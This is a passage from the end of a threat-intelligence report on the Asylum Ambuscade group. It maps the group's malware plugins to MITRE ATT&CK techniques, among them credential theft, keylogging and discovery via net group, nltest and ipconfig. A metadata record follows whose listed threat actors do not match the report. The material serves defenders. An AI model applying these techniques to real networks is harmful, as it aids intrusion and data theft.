Ambuscade has a downloader in VBS.\r\nT1059.006\r\nCommand and Scripting\r\nInterpreter: Python\r\nAsylum Ambuscade has a screenshotter in Python.\r\nT1059.007\r\nCommand and Scripting\r\nInterpreter: JavaScript\r\nAsylum Ambuscade has a downloader in JavaScript\r\n(NODEBOT).\r\nT1059\r\nCommand and Scripting\r\nInterpreter\r\nAsylum Ambuscade has downloaders in other\r\nscripting languages such as Lua, AutoHotkey, or Tcl.\r\nT1204.002\r\nUser Execution: Malicious\r\nFile\r\nTargets needs to manually execute the malicious\r\ndocument or JavaScript file.\r\nPersistence T1547.001\r\nBoot or Logon Autostart\r\nExecution: Registry Run\r\nKeys / Startup Folder\r\nSunSeed persists via a LNK file in the startup folder.\r\nDefense\r\nEvasion\r\nT1027.010\r\nObfuscated Files or\r\nInformation: Command\r\nObfuscation\r\nDownloaded JavaScript files are obfuscated with junk\r\ncode.\r\nCredential\r\nAccess\r\nT1555.003\r\nCredentials from Password\r\nStores: Credentials from\r\nWeb Browsers\r\nAHKBOT passwords plugin can steal browser\r\ncredentials.\r\nDiscovery\r\nT1087.002\r\nAccount Discovery:\r\nDomain Account\r\nAHKBOT domain plugin gathers information about\r\nthe domain using net group.\r\nT1010\r\nApplication Window\r\nDiscovery\r\nAHKBOT wndlist plugin lists the active windows.\r\nT1482 Domain Trust Discovery\r\nAHKBOT domain plugin gathers information using\r\nnltest.\r\nT1057 Process Discovery\r\nAHKBOT tasklist plugin lists the active processes\r\nusing Select * from Win32_Process.\r\nT1518.001\r\nSoftware Discovery:\r\nSecurity Software\r\nDiscovery\r\nAHKBOT hardware plugin lists security software\r\nusing Select * from FirewallProduct, Select * from\r\nAntiSpywareProduct and Select * from\r\nAntiVirusProduct.\r\nT1082\r\nSystem Information\r\nDiscovery\r\nAHKBOT wndlist plugin gets system information\r\nusing systeminfo.\r\nT1016\r\nSystem Network\r\nConfiguration Discovery\r\nAHKBOT wndlist plugin gets network configuration\r\ninformation using ipconfig /all.\r\nhttps://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nPage 14 of 15\n\nTactic ID Name Description\r\nCollection\r\nT1056.001 Input Capture: Keylogging AHKBOT keylogon records keystrokes.\r\nT1115 Clipboard Data AHKBOT keylogon monitors the clipboard.\r\nT1113 Screen Capture AHKBOT deskscreen takes screenshot.\r\nCommand and\r\nControl\r\nT1071.001\r\nApplication Layer Protocol:\r\nWeb Protocols\r\nAHKBOT (and all the other downloaders)\r\ncommunicates with the C\u0026C server via HTTP.\r\nExfiltration T1041\r\nExfiltration Over C2\r\nChannel\r\nData is exfiltrated via the C\u0026C channel.\r\nSource: https://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nhttps://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nPage 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/" ], "report_names": [ "asylum-ambuscade-crimeware-or-cyberespionage" ], "threat_actors": [ { "id": "3cc6c262-df23-4075-a93f-b496e8908eb2", "created_at": "2022-10-25T16:07:23.682239Z", "updated_at": "2026-04-10T02:00:04.708878Z", "deleted_at": null, "main_name": "GhostNet", "aliases": [ "GhostNet", "Snooping Dragon" ], "source_name": "ETDA:GhostNet", "tools": [ "AngryRebel", "Farfli", "Gh0st RAT", "Gh0stnet", "Ghost RAT", "Ghostnet", "Moudour", "Mydoor", "PCRat", "Remosh", "TOM-Skype" ], "source_id": "ETDA", "reports": null }, { "id": "e91dae30-a513-4fb1-aace-4457466313b3", "created_at": "2023-01-06T13:46:38.974913Z", "updated_at": "2026-04-10T02:00:03.168521Z", "deleted_at": null, "main_name": "GhostNet", "aliases": [ "Snooping Dragon" ], "source_name": "MISPGALAXY:GhostNet", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "236a8303-bf12-4787-b6d0-549b44271a19", "created_at": "2024-06-04T02:03:07.966137Z", "updated_at": "2026-04-10T02:00:03.706923Z", "deleted_at": null, "main_name": "IRON TILDEN", "aliases": [ "ACTINIUM ", "Aqua Blizzard ", "Armageddon", "Blue Otso ", "BlueAlpha ", "Dancing Salome ", "Gamaredon", "Gamaredon Group", "Hive0051 ", "Primitive Bear ", "Shuckworm ", "Trident Ursa ", "UAC-0010 ", "UNC530 ", "WinterFlounder " ], "source_name": "Secureworks:IRON TILDEN", "tools": [ "Pterodo" ], "source_id": "Secureworks", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434308, "ts_updated_at": 1775792224, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/2da70f4bb602b1c894e4993169ed5eb99482e0a9.pdf", "text": "https://archive.orkl.eu/2da70f4bb602b1c894e4993169ed5eb99482e0a9.txt", "img": "https://archive.orkl.eu/2da70f4bb602b1c894e4993169ed5eb99482e0a9.jpg" } }